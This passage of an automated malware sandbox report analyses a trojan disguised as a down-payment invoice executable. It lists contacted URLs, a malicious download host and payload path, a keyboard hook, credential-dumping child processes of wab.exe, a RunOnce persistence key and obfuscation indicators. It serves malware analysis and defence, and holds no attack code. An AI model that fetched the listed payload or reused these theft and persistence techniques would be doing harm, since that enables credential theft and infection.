              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://use.typekit.net/ecr2zvs.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: wab.exe, 00000009.00000003.40250168695.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249957635.00000000046B3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254635212.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.adobe.
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.digicert.com/CPS0
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.globalsign.com/repository/0
              Source: wab.exe, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.google.com/
              Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.dr String found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.dr String found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/api
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240184394.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFl
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/de-ch/homepage/secure/silentpassport?secure=true&lc=2055
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: bhv3A27.tmp.9.dr String found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: gudanidevelopment.ge
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match | File source: 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 1392, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED

              System Summary

              Source: initial sample | Static PE information: Filename: 18001787_down_payment_invoice_90002104.exe
              Source: 18001787_down_payment_invoice_90002104.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00404DCC
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00406AF2
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_6F1D1B63
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_3_04C94169
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_3563B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_35647194
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_0449A127 Sleep,NtProtectVirtualMemory
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00401806 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004016FC NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004017B6 NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Section loaded: edgegdi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: edgegdi.dll
              Source: 18001787_down_payment_invoice_90002104.exe | Static PE information: invalid certificate
              Source: 18001787_down_payment_invoice_90002104.exe | Virustotal: Detection: 11%
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | File read: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
              Source: 18001787_down_payment_invoice_90002104.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
              Source: unknown | Process created: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ixfof
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\szlggikjo
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\utqzgbudcvrn
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System information queried: HandleInformation
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | File created: C:\Users\user\AppData\Local\Admonishment64
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | File created: C:\Users\user\AppData\Local\Temp\nszD5CF.tmp
              Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@9/18@4/3
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00402104 CoCreateInstance
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.45066609211.0000000035570000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: 18001787_down_payment_invoice_90002104.exe | Static file information: File size 1091672 > 1048576
              Source: 18001787_down_payment_invoice_90002104.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: Yara match | File source: 00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.40189422367.0000000003F89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.40188235622.0000000000690000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: 18001787_down_payment_invoice_90002104.exe PID: 3312, type: MEMORYSTR
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_6F1D2FD0 push eax; ret 3_2_6F1D2FFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_35632806 push ecx; ret 7_2_35632819
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00444355 push ecx; ret 10_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004446D0 push eax; ret 10_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004446D0 push eax; ret 10_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044AC84 push eax; ret 10_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_6F1D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | File created: C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Dominionist
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5116 | Thread sleep count: 3596 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7100 | Thread sleep count: 70 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7100 | Thread sleep time: -35000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6752 | Thread sleep count: 5338 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6752 | Thread sleep time: -16014000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread sleep count: Count: 3596 delay: -5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 3596
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 5338
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: foregroundWindowGot 1724
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 9.7 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information queried: ProcessInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_00418981 memset,GetSystemInfo
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_0040672B FindFirstFileW,FindClose
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe | Code function: 3_2_00402868 FindFirstFileW
